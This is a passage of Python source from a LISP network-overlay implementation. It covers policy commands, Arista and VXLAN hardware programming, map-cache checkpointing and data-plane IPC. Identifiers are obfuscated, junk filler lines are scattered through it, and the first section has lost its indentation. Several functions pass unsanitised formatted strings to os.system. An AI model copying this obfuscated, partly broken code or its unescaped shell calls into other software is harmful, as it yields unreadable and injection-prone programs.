i1i . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
i1i . source_rloc . store_prefix ( Ooo0oO0O00o0 )
if ( oO0OoO000oO0o == "destination-rloc" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
i1i . dest_rloc . store_prefix ( Ooo0oO0O00o0 )
if ( oO0OoO000oO0o == "rloc-record-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . rloc_record_name = Ooo0oO0O00o0
if ( oO0OoO000oO0o == "geo-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . geo_name = Ooo0oO0O00o0
if ( oO0OoO000oO0o == "elp-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . elp_name = Ooo0oO0O00o0
if ( oO0OoO000oO0o == "rle-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . rle_name = Ooo0oO0O00o0
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
if ( oO0OoO000oO0o == "json-name" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
i1i . json_name = Ooo0oO0O00o0
if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
if 53 - 53: I1Ii111 % i11iIiiIii
if ( oO0OoO000oO0o == "datetime-range" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
oOO0O00o0O0 = lisp_datetime ( Ooo0oO0O00o0 [ 0 : 19 ] )
ii11IIiI1iIi = lisp_datetime ( Ooo0oO0O00o0 [ 19 : : ] )
if ( oOO0O00o0O0 . valid_datetime ( ) and ii11IIiI1iIi . valid_datetime ( ) ) :
i1i . datetime_lower = oOO0O00o0O0
i1i . datetime_upper = ii11IIiI1iIi
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
if 93 - 93: I1Ii111 + OOooOOo % ooOoO0o / I1Ii111 % OOooOOo . IiII
if 37 - 37: iII111i * oO0o / oO0o / Ii1I % I11i
if ( oO0OoO000oO0o == "set-action" ) :
iIIiiIi . set_action = oOO0
if 12 - 12: i11iIiiIii
if ( oO0OoO000oO0o == "set-record-ttl" ) :
iIIiiIi . set_record_ttl = int ( oOO0 )
if 62 - 62: oO0o + OOooOOo + oO0o + I1IiiI
if ( oO0OoO000oO0o == "set-instance-id" ) :
if ( iIIiiIi . set_source_eid == None ) :
iIIiiIi . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 10 - 10: IiII - Oo0Ooo % ooOoO0o
if ( iIIiiIi . set_dest_eid == None ) :
iIIiiIi . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 38 - 38: oO0o * o0oOOo0O0Ooo . I11i % II111iiii / I11i % Ii1I
I1oO0 = int ( oOO0 )
iIIiiIi . set_source_eid . instance_id = I1oO0
iIIiiIi . set_dest_eid . instance_id = I1oO0
if 19 - 19: II111iiii / i11iIiiIii * II111iiii + OoOoOO00 - OoOoOO00
if ( oO0OoO000oO0o == "set-source-eid" ) :
if ( iIIiiIi . set_source_eid == None ) :
iIIiiIi . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 7 - 7: OoOoOO00 - OoO0O00 % OoOoOO00 . I1ii11iIi11i % Oo0Ooo * iII111i
iIIiiIi . set_source_eid . store_prefix ( oOO0 )
if ( I1oO0 != None ) : iIIiiIi . set_source_eid . instance_id = I1oO0
if 90 - 90: IiII - OOooOOo + iIii1I11I1II1
if ( oO0OoO000oO0o == "set-destination-eid" ) :
if ( iIIiiIi . set_dest_eid == None ) :
iIIiiIi . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 88 - 88: ooOoO0o . o0oOOo0O0Ooo . OOooOOo - I11i
iIIiiIi . set_dest_eid . store_prefix ( oOO0 )
if ( I1oO0 != None ) : iIIiiIi . set_dest_eid . instance_id = I1oO0
if 76 - 76: IiII % I1IiiI . iII111i
if ( oO0OoO000oO0o == "set-rloc-address" ) :
iIIiiIi . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iIIiiIi . set_rloc_address . store_address ( oOO0 )
if 5 - 5: ooOoO0o . oO0o - OoOoOO00 - OoooooooOO
if ( oO0OoO000oO0o == "set-rloc-record-name" ) :
iIIiiIi . set_rloc_record_name = oOO0
if 2 - 2: OOooOOo
if ( oO0OoO000oO0o == "set-elp-name" ) :
iIIiiIi . set_elp_name = oOO0
if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
if ( oO0OoO000oO0o == "set-geo-name" ) :
iIIiiIi . set_geo_name = oOO0
if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
if ( oO0OoO000oO0o == "set-rle-name" ) :
iIIiiIi . set_rle_name = oOO0
if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
if ( oO0OoO000oO0o == "set-json-name" ) :
iIIiiIi . set_json_name = oOO0
if 78 - 78: OoO0O00 - i1IIi % I1Ii111
if ( oO0OoO000oO0o == "policy-name" ) :
iIIiiIi . policy_name = oOO0
if 87 - 87: I11i
if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
if 4 - 4: OOooOOo + II111iiii
if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
if 43 - 43: i11iIiiIii * I1IiiI
iIIiiIi . match_clauses = o00ooOO
iIIiiIi . save_policy ( )
return
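#
# lisp_policy_commands
#
# Command table for the "lisp policy" clause. Each keyword maps to a list
# whose first element appears to say whether the keyword takes a value;
# numeric entries presumably bound the allowed range and string entries
# enumerate the allowed values (e.g. set-action is "process" or "drop").
#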
lisp_policy_commands = {
    "lisp policy": [lisp_policy_command, {
        "policy-name": [True],
        "match": [],
        "instance-id": [True, 0, 0xffffffff],
        "source-eid": [True],
        "destination-eid": [True],
        "source-rloc": [True],
        "destination-rloc": [True],
        "rloc-record-name": [True],
        "elp-name": [True],
        "geo-name": [True],
        "rle-name": [True],
        "json-name": [True],
        "datetime-range": [True],
        "set-action": [False, "process", "drop"],
        "set-record-ttl": [True, 0, 0x7fffffff],
        "set-instance-id": [True, 0, 0xffffffff],
        "set-source-eid": [True],
        "set-destination-eid": [True],
        "set-rloc-address": [True],
        "set-rloc-record-name": [True],
        "set-elp-name": [True],
        "set-geo-name": [True],
        "set-rle-name": [True],
        "set-json-name": [True]}]
}
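#
# lisp_send_to_arista
#
# Push a configuration command to Arista hardware by shelling out to
# FastCli. When 'interface' is supplied, the command is issued inside
# that interface's config context.
#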
def lisp_send_to_arista(command, interface):
    interface = "" if (interface == None) else "interface " + interface

    oO0oiII = command
    if (interface != ""): oO0oiII = interface + ": " + oO0oiII
    lprint("Send CLI command '{}' to hardware".format(oO0oiII))

    Ii1I1IIiii = '''
enable
configure
{}
{}
'''.format(interface, command)

    os.system("FastCli -c '{}'".format(Ii1I1IIiii))
    return
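#
# lisp_arista_is_alive
#
# Ask the Arista forwarding table whether 'prefix' is programmed in
# hardware. Skips the header line of the FastCli output and returns True
# when the last column of the route row is "Y" (presumably the
# hardware-programmed flag).
#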
def lisp_arista_is_alive(prefix):
    oO00o00 = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
    oOo0OOoooO = getoutput("FastCli -c '{}'".format(oO00o00))

    oOo0OOoooO = oOo0OOoooO.split("\n")[1]
    OoO0Oo0OoOo = oOo0OOoooO.split(" ")
    OoO0Oo0OoOo = OoO0Oo0OoOo[-1].replace("\r", "")

    return (OoO0Oo0OoOo == "Y")
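#
# lisp_program_vxlan_hardware
#
# Program a map-cache entry into VXLAN hardware (observed here as an
# Arista platform): allocate an unused next-hop address on vlan4094,
# install a static ARP entry with a MAC derived from the low-order bytes
# of the best RLOC, point a static MAC-table entry at the VXLAN VTEP,
# then add a kernel route for the EID-prefix via the allocated next-hop.
# Bails out early when the platform directory, a best RLOC, or the
# vxlan/vlan4094 interfaces are missing.
#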
def lisp_program_vxlan_hardware(mc):
    if (os.path.exists("/persist/local/lispers.net") == False): return

    if (len(mc.best_rloc_set) == 0): return

    o0OOOooO = mc.eid.print_prefix_no_iid()
    iIIiI11 = mc.best_rloc_set[0].rloc.print_address_no_iid()

    ii11i11iiI = getoutput("ip route get {} | egrep vlan4094".format(o0OOOooO))

    if (ii11i11iiI != ""):
        lprint("Route {} already in hardware: '{}'".format(
            green(o0OOOooO, False), ii11i11iiI))
        return

    I1II11IIIiI11 = getoutput("ifconfig | egrep 'vxlan|vlan4094'")
    if (I1II11IIIiI11.find("vxlan") == -1):
        lprint("No VXLAN interface found, cannot program hardware")
        return

    if (I1II11IIIiI11.find("vlan4094") == -1):
        lprint("No vlan4094 interface found, cannot program hardware")
        return

    IIIIiII = getoutput("ip addr | egrep vlan4094 | egrep inet")
    if (IIIIiII == ""):
        lprint("No IP address found on vlan4094, cannot program hardware")
        return

    IIIIiII = IIIIiII.split("inet ")[1]
    IIIIiII = IIIIiII.split("/")[0]

    iII = []
    O000oOoo = getoutput("arp -i vlan4094").split("\n")
    for IiiiI1 in O000oOoo:
        if (IiiiI1.find("vlan4094") == -1): continue
        if (IiiiI1.find("(incomplete)") == -1): continue
        OoII1 = IiiiI1.split(" ")[0]
        iII.append(OoII1)

    OoII1 = None
    ooO0oOOoOO = IIIIiII
    IIIIiII = IIIIiII.split(".")
    for iIi1iIIIiIiI in range(1, 255):
        IIIIiII[3] = str(iIi1iIIIiIiI)
        IiI = ".".join(IIIIiII)
        if (IiI in iII): continue
        if (IiI == ooO0oOOoOO): continue
        OoII1 = IiI
        break

    if (OoII1 == None):
        lprint("Address allocation failed for vlan4094, cannot program hardware")
        return

    OOooOOo0ooO00OO0 = iIIiI11.split(".")
    Oooo = lisp_hex_string(OOooOOo0ooO00OO0[1]).zfill(2)
    I1i11I111i = lisp_hex_string(OOooOOo0ooO00OO0[2]).zfill(2)
    I11iI1 = lisp_hex_string(OOooOOo0ooO00OO0[3]).zfill(2)
    iiiI1IiIIii = "00:00:00:{}:{}:{}".format(Oooo, I1i11I111i, I11iI1)
    ii1Ii1iII1iIi = "0000.00{}.{}{}".format(Oooo, I1i11I111i, I11iI1)
    i1I1iII1111II = "arp -i vlan4094 -s {} {}".format(OoII1, iiiI1IiIIii)
    os.system(i1I1iII1111II)

    Ii1III1 = ("mac address-table static {} vlan 4094 " +
        "interface vxlan 1 vtep {}").format(ii1Ii1iII1iIi, iIIiI11)

    lisp_send_to_arista(Ii1III1, None)

    IIi11I1IIii = "ip route add {} via {}".format(o0OOOooO, OoII1)
    os.system(IIi11I1IIii)

    lprint("Hardware programmed with commands:")
    IIi11I1IIii = IIi11I1IIii.replace(o0OOOooO, green(o0OOOooO, False))
    lprint(" " + IIi11I1IIii)
    lprint(" " + i1I1iII1111II)
    Ii1III1 = Ii1III1.replace(iIIiI11, red(iIIiI11, False))
    lprint(" " + Ii1III1)
    return
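#
# lisp_clear_hardware_walk
#
# Map-cache walker callback: remove the kernel route for one EID-prefix.
# Returns [True, None] so the walk continues.
#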
def lisp_clear_hardware_walk(mc, parms):
    Oo0OoOI1I11iII1I1i = mc.eid.print_prefix_no_iid()
    os.system("ip route delete {}".format(Oo0OoOI1I11iII1I1i))
    return ([True, None])
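#
# lisp_clear_map_cache
#
# Clear the entire map-cache plus all state derived from it: the
# RLOC-probe list, encap/decap crypto keys, RTR list, and gleaned
# groups. Also asks the external data-plane to flush its copy via
# lisp_process_data_plane_restart().
#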
def lisp_clear_map_cache():
    global lisp_map_cache, lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list, lisp_gleaned_groups
    global lisp_no_map_request_rate_limit

    iiIIIiII = bold("User cleared", False)
    O0oo0oOo = lisp_map_cache.cache_count
    lprint("{} map-cache with {} entries".format(iiIIIiII, O0oo0oOo))

    if (lisp_program_hardware):
        lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)

    lisp_map_cache = lisp_cache()

    lisp_no_map_request_rate_limit = lisp_get_timestamp()

    lisp_rloc_probe_list = {}

    lisp_crypto_keys_by_rloc_encap = {}
    lisp_crypto_keys_by_rloc_decap = {}

    lisp_rtr_list = {}

    lisp_gleaned_groups = {}

    lisp_process_data_plane_restart(True)
    return
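#
# lisp_encapsulate_rloc_probe
#
# Prepend an IPv4/UDP header to a RLOC-probe and send it data-
# encapsulated so it traverses NATs; the extra 28 bytes are 20 (IP)
# plus 8 (UDP). Instance-ID 0xffffff appears to mark the probe's inner
# header.
#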
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
    if (len(lisp_sockets) != 4): return

    IIIiiI11ii = lisp_myrlocs[0]

    i1iIii = len(packet) + 28
    O0O = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(i1iIii), 0, 64,
        17, 0, socket.htonl(IIIiiI11ii.address), socket.htonl(rloc.address))
    O0O = lisp_ip_checksum(O0O)

    O0I1II1 = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
        socket.htons(i1iIii - 20), 0)

    packet = lisp_packet(O0O + O0I1II1 + packet)

    packet.inner_dest.copy_address(rloc)
    packet.inner_dest.instance_id = 0xffffff
    packet.inner_source.copy_address(IIIiiI11ii)
    packet.inner_ttl = 64
    packet.outer_dest.copy_address(rloc)
    packet.outer_source.copy_address(IIIiiI11ii)
    packet.outer_version = packet.outer_dest.afi_to_version()
    packet.outer_ttl = 64
    packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT

    IIIOo0O = red(rloc.print_address_no_iid(), False)
    if (nat_info):
        oOOOo00000Oo = " {}".format(blue(nat_info.hostname, False))
        Oooooo0OOO = bold("RLOC-probe request", False)
    else:
        oOOOo00000Oo = ""
        Oooooo0OOO = bold("RLOC-probe reply", False)

    lprint(("Data encapsulate {} to {}{} port {} for " +
        "NAT-traversal").format(Oooooo0OOO, IIIOo0O, oOOOo00000Oo,
        packet.encap_port))

    if (packet.encode(None) == None): return
    packet.print_packet("Send", True)

    oooIIiI1iiIi1i = lisp_sockets[3]
    packet.send_packet(oooIIiI1iiIi1i, packet.outer_dest)
    del (packet)
    return
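#
# lisp_get_default_route_next_hops
#
# Return [[interface, next-hop], ...] for the default route. Uses
# "route -n get default" on macOS and "ip route" on Linux, skipping
# Linux default routes that carry a metric.
#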
def lisp_get_default_route_next_hops():
    if (lisp_is_macos()):
        oO00o00 = "route -n get default"
        O0o000oo00o00 = getoutput(oO00o00).split("\n")
        Iio0o00oo0OoOo = i111IIiIiiI1 = None
        for o0OoO0 in O0o000oo00o00:
            if (o0OoO0.find("gateway: ") != -1): Iio0o00oo0OoOo = o0OoO0.split(": ")[1]
            if (o0OoO0.find("interface: ") != -1): i111IIiIiiI1 = o0OoO0.split(": ")[1]
        return ([[i111IIiIiiI1, Iio0o00oo0OoOo]])

    oO00o00 = "ip route | egrep 'default via'"
    IIOoo0O = getoutput(oO00o00).split("\n")

    Ii11i = []
    for ii11i11iiI in IIOoo0O:
        if (ii11i11iiI.find(" metric ") != -1): continue
        iiiI1I = ii11i11iiI.split(" ")
        try:
            IIIIII1I = iiiI1I.index("via") + 1
            if (IIIIII1I >= len(iiiI1I)): continue
            O0OooOOO000 = iiiI1I.index("dev") + 1
            if (O0OooOOO000 >= len(iiiI1I)): continue
        except:
            continue

        Ii11i.append([iiiI1I[O0OooOOO000], iiiI1I[IIIIII1I]])

    return (Ii11i)
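#
# lisp_get_host_route_next_hop
#
# Return the next-hop of the kernel host-route for 'rloc', or None when
# no such route exists.
#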
def lisp_get_host_route_next_hop(rloc):
    oO00o00 = "ip route | egrep '{} via'".format(rloc)
    ii11i11iiI = getoutput(oO00o00).split(" ")

    try: OOOooo0OooOoO = ii11i11iiI.index("via") + 1
    except: return (None)

    if (OOOooo0OooOoO >= len(ii11i11iiI)): return (None)
    return (ii11i11iiI[OOOooo0OooOoO])
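#
# lisp_install_host_route
#
# Add or delete a /32 host-route for 'dest', optionally via next-hop
# 'nh'. 'install' is a boolean selecting add versus delete.
#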
def lisp_install_host_route(dest, nh, install):
    install = "add" if install else "delete"
    iIiI1iIiII1 = "none" if nh == None else nh

    lprint("{} host-route {}, nh {}".format(install.title(), dest, iIiI1iIiII1))

    if (nh == None):
        O0Ooo0iII111III = "ip route {} {}/32".format(install, dest)
    else:
        O0Ooo0iII111III = "ip route {} {}/32 via {}".format(install, dest, nh)

    os.system(O0Ooo0iII111III)
    return
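#
# lisp_checkpoint
#
# Write the supplied list of map-cache entry strings to the checkpoint
# file, one per line, when checkpointing is enabled.
#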
def lisp_checkpoint(checkpoint_list):
    if (lisp_checkpoint_map_cache == False): return

    o0OoO0 = open(lisp_checkpoint_filename, "w")
    for oo0O00OOOOO in checkpoint_list:
        o0OoO0.write(oo0O00OOOOO + "\n")
    o0OoO0.close()
    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return
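#
# lisp_load_checkpoint
#
# Reload map-cache entries from the checkpoint file written by
# lisp_write_checkpoint_entry(). Judging by the parser, each line looks
# like (illustrative):
#
#   <eid-prefix> rloc <addr> <priority> <weight>, <addr> <prio> <weight>
#
# or "<eid-prefix> rloc native-forward". Entries are installed with the
# negative map-reply TTL and flagged as checkpoint entries.
#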
def lisp_load_checkpoint():
    if (lisp_checkpoint_map_cache == False): return
    if (os.path.exists(lisp_checkpoint_filename) == False): return

    o0OoO0 = open(lisp_checkpoint_filename, "r")

    O0oo0oOo = 0
    for oo0O00OOOOO in o0OoO0:
        O0oo0oOo += 1
        oO0ooOOO = oo0O00OOOOO.split(" rloc ")
        OOOO00 = [] if (oO0ooOOO[1] in ["native-forward\n", "\n"]) else oO0ooOOO[1].split(", ")

        OO00O000OOO = []
        for iIIiI11 in OOOO00:
            OOOoOoo = lisp_rloc(False)
            iiiI1I = iIIiI11.split(" ")
            OOOoOoo.rloc.store_address(iiiI1I[0])
            OOOoOoo.priority = int(iiiI1I[1])
            OOOoOoo.weight = int(iiiI1I[2])
            OO00O000OOO.append(OOOoOoo)

        I11iiI1III = lisp_mapping("", "", OO00O000OOO)
        if (I11iiI1III != None):
            I11iiI1III.eid.store_prefix(oO0ooOOO[0])
            I11iiI1III.checkpoint_entry = True
            I11iiI1III.map_cache_ttl = LISP_NMR_TTL * 60
            if (OO00O000OOO == []): I11iiI1III.action = LISP_NATIVE_FORWARD_ACTION
            I11iiI1III.add_cache()
            continue

        O0oo0oOo -= 1

    o0OoO0.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), O0oo0oOo, lisp_checkpoint_filename))
    return
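#
# lisp_write_checkpoint_entry
#
# Render one map-cache entry into the checkpoint line format consumed by
# lisp_load_checkpoint() and append it to 'checkpoint_list'.
#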
def lisp_write_checkpoint_entry(checkpoint_list, mc):
    if (lisp_checkpoint_map_cache == False): return

    oo0O00OOOOO = "{} rloc ".format(mc.eid.print_prefix())

    for OOOoOoo in mc.rloc_set:
        if (OOOoOoo.rloc.is_null()): continue
        oo0O00OOOOO += "{} {} {}, ".format(OOOoOoo.rloc.print_address_no_iid(),
            OOOoOoo.priority, OOOoOoo.weight)

    if (mc.rloc_set != []):
        oo0O00OOOOO = oo0O00OOOOO[0:-2]
    elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
        oo0O00OOOOO += "native-forward"

    checkpoint_list.append(oo0O00OOOOO)
    return
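#
# lisp_check_dp_socket
#
# Return True when the data-plane named socket exists, logging when it
# does not.
#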
def lisp_check_dp_socket():
    OOoooOOOoo = lisp_ipc_dp_socket_name
    if (os.path.exists(OOoooOOOoo) == False):
        OOI11iiiiiII1 = bold("does not exist", False)
        lprint("Socket '{}' {}".format(OOoooOOOoo, OOI11iiiiiII1))
        return (False)
    return (True)
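#
# lisp_write_to_dp_socket
#
# JSON-encode an IPC record and write it to the data-plane named socket.
#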
def lisp_write_to_dp_socket(entry):
    o0OO0ooooO = None
    try:
        o0OO0ooooO = json.dumps(entry)
        I1IiI11iI1Iii = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(I1IiI11iI1Iii, o0OO0ooooO))
        lisp_ipc_dp_socket.sendto(o0OO0ooooO, lisp_ipc_dp_socket_name)
    except:
        lprint("Failed to write IPC record to named socket: '{}'".format(o0OO0ooooO))
    return
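#
# lisp_write_ipc_keys
#
# After a key change on 'rloc', push refreshed map-cache IPC records for
# every map-cache entry that references that RLOC (keyed by address, or
# address:port when NAT-translated).
#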
def lisp_write_ipc_keys(rloc):
    O0O0 = rloc.rloc.print_address_no_iid()
    ooO0 = rloc.translated_port
    if (ooO0 != 0): O0O0 += ":" + str(ooO0)
    if (O0O0 not in lisp_rloc_probe_list): return

    for iiiI1I, oO0ooOOO, Oo in lisp_rloc_probe_list[O0O0]:
        I11iiI1III = lisp_map_cache.lookup_cache(oO0ooOOO, True)
        if (I11iiI1III == None): continue
        lisp_write_ipc_map_cache(True, I11iiI1III)
    return
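#
# lisp_write_ipc_map_cache
#
# Send a map-cache add/delete record to the data-plane over IPC. A
# multicast (S,G) entry carries an "rles" array, a unicast entry an
# "rlocs" array. Illustrative record shape, inferred from the code
# below:
#
#   { "type" : "map-cache", "opcode" : "add", "instance-id" : "0",
#     "eid-prefix" : "10.0.0.0/8",
#     "rlocs" : [ { "rloc" : "192.0.2.1", "priority" : "1",
#                   "weight" : "50", "port" : "4341" } ] }
#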
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    oOOoo = "add" if add_or_delete else "delete"
    oo0O00OOOOO = {"type": "map-cache", "opcode": oOOoo}

    II1OO0Oo0oOOO000 = (mc.group.is_null() == False)
    if (II1OO0Oo0oOOO000):
        oo0O00OOOOO["eid-prefix"] = mc.group.print_prefix_no_iid()
        oo0O00OOOOO["rles"] = []
    else:
        oo0O00OOOOO["eid-prefix"] = mc.eid.print_prefix_no_iid()
        oo0O00OOOOO["rlocs"] = []

    oo0O00OOOOO["instance-id"] = str(mc.eid.instance_id)

    if (II1OO0Oo0oOOO000):
        if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
            for iIIi in mc.rloc_set[0].rle.rle_forwarding_list:
                IiI = iIIi.address.print_address_no_iid()
                ooO0 = str(4341) if iIIi.translated_port == 0 else str(iIIi.translated_port)

                iiiI1I = {"rle": IiI, "port": ooO0}
                iiIio0o0, OoO0OOo0OOoOO = iIIi.get_encap_keys()
                iiiI1I = lisp_build_json_keys(iiiI1I, iiIio0o0, OoO0OOo0OOoOO,
                    "encrypt-key")
                oo0O00OOOOO["rles"].append(iiiI1I)
    else:
        for iIIiI11 in mc.rloc_set:
            if (iIIiI11.rloc.is_ipv4() == False and iIIiI11.rloc.is_ipv6() == False):
                continue
            if (iIIiI11.up_state() == False): continue

            ooO0 = str(4341) if iIIiI11.translated_port == 0 else str(iIIiI11.translated_port)

            iiiI1I = {"rloc": iIIiI11.rloc.print_address_no_iid(), "priority":
                str(iIIiI11.priority), "weight": str(iIIiI11.weight), "port":
                ooO0}
            iiIio0o0, OoO0OOo0OOoOO = iIIiI11.get_encap_keys()
            iiiI1I = lisp_build_json_keys(iiiI1I, iiIio0o0, OoO0OOo0OOoOO,
                "encrypt-key")
            oo0O00OOOOO["rlocs"].append(iiiI1I)

    if (dont_send == False): lisp_write_to_dp_socket(oo0O00OOOOO)
    return (oo0O00OOOOO)
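#
# lisp_write_ipc_decap_key
#
# Send the decryption and ICV keys for an RLOC (or RLOC:port) to the
# data-plane. Only key-id 1 is written.
#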
def lisp_write_ipc_decap_key(rloc_addr, keys):
    if (lisp_i_am_itr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    if (keys == None or len(keys) == 0 or keys[1] == None): return

    iiIio0o0 = keys[1].encrypt_key
    OoO0OOo0OOoOO = keys[1].icv_key

    OOooOO000oo = rloc_addr.split(":")
    if (len(OOooOO000oo) == 1):
        oo0O00OOOOO = {"type": "decap-keys", "rloc": OOooOO000oo[0]}
    else:
        oo0O00OOOOO = {"type": "decap-keys", "rloc": OOooOO000oo[0],
            "port": OOooOO000oo[1]}

    oo0O00OOOOO = lisp_build_json_keys(oo0O00OOOOO, iiIio0o0, OoO0OOo0OOoOO,
        "decrypt-key")

    lisp_write_to_dp_socket(oo0O00OOOOO)
    return
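#
# lisp_build_json_keys
#
# Append a one-element "keys" array to an IPC record; 'key_type' is the
# JSON key name used for the encryption key ("encrypt-key" or
# "decrypt-key").
#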
def lisp_build_json_keys(entry, ekey, ikey, key_type):
    if (ekey == None): return (entry)

    entry["keys"] = []
    III = {"key-id": "1", key_type: ekey, "icv-key": ikey}
    entry["keys"].append(III)
    return (entry)
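#
# lisp_write_ipc_database_mappings
#
# Tell the data-plane which IPv4/IPv6 EID-prefixes this ETR is
# authoritative for, followed by the ephemeral NAT port it should use.
#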
def lisp_write_ipc_database_mappings(ephem_port):
    if (lisp_i_am_etr == False): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    oo0O00OOOOO = {"type": "database-mappings", "database-mappings": []}

    for OoO0oO in lisp_db_list:
        if (OoO0oO.eid.is_ipv4() == False and OoO0oO.eid.is_ipv6() == False):
            continue
        OoOo00 = {"instance-id": str(OoO0oO.eid.instance_id),
            "eid-prefix": OoO0oO.eid.print_prefix_no_iid()}
        oo0O00OOOOO["database-mappings"].append(OoOo00)

    lisp_write_to_dp_socket(oo0O00OOOOO)

    oo0O00OOOOO = {"type": "etr-nat-port", "port": ephem_port}
    lisp_write_to_dp_socket(oo0O00OOOOO)
    return
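#
# lisp_write_ipc_interfaces
#
# Tell the data-plane the instance-ID associated with each configured
# interface.
#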
def lisp_write_ipc_interfaces():
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    oo0O00OOOOO = {"type": "interfaces", "interfaces": []}

    for i111IIiIiiI1 in list(lisp_myinterfaces.values()):
        if (i111IIiIiiI1.instance_id == None): continue
        OoOo00 = {"interface": i111IIiIiiI1.device,
            "instance-id": str(i111IIiIiiI1.instance_id)}
        oo0O00OOOOO["interfaces"].append(OoOo00)

    lisp_write_to_dp_socket(oo0O00OOOOO)
    return
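#
# lisp_parse_auth_key
#
# Parse an authentication-key configuration value into a dict keyed by
# key-id. A value with no "[<id>]" prefixes maps entirely to key-id 0.
# Illustrative behavior, inferred from the code below:
#
#   lisp_parse_auth_key("password")     -> {0: "password"}
#   lisp_parse_auth_key("[1]foo[2]bar") -> {1: "foo", 2: "bar"}
#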
def lisp_parse_auth_key(value):
    Iii1iIi1i = value.split("[")
    i11i1Ii = {}
    if (len(Iii1iIi1i) == 1):
        i11i1Ii[0] = value
        return (i11i1Ii)

    for Ooo0oO0O00o0 in Iii1iIi1i:
        if (Ooo0oO0O00o0 == ""): continue
        OOOooo0OooOoO = Ooo0oO0O00o0.find("]")
        IiII11iI1 = Ooo0oO0O00o0[0:OOOooo0OooOoO]
        try: IiII11iI1 = int(IiII11iI1)
        except: return

        i11i1Ii[IiII11iI1] = Ooo0oO0O00o0[OOOooo0OooOoO + 1::]

    return (i11i1Ii)
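#
# lisp_reassemble
#
# Reassemble IPv4 fragments of LISP-encapsulated packets. Non-fragments
# (offset 0 with DF, or no fragmentation bits) pass through. A first
# fragment whose UDP ports show it is not LISP/VXLAN traffic poisons the
# queue so later fragments of that packet-id are dropped. When all
# fragments from offset 0 to the last-fragment marker are present and
# contiguous, the payloads are spliced, the IP header is rebuilt with a
# cleared fragment field and recomputed checksum, and the whole packet
# is returned.
#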
def lisp_reassemble(packet):
    Oo0ooo = socket.ntohs(struct.unpack("H", packet[6:8])[0])

    if (Oo0ooo == 0 or Oo0ooo == 0x4000): return (packet)

    OOoo0 = socket.ntohs(struct.unpack("H", packet[4:6])[0])
    oOi11iIIIIi = socket.ntohs(struct.unpack("H", packet[2:4])[0])

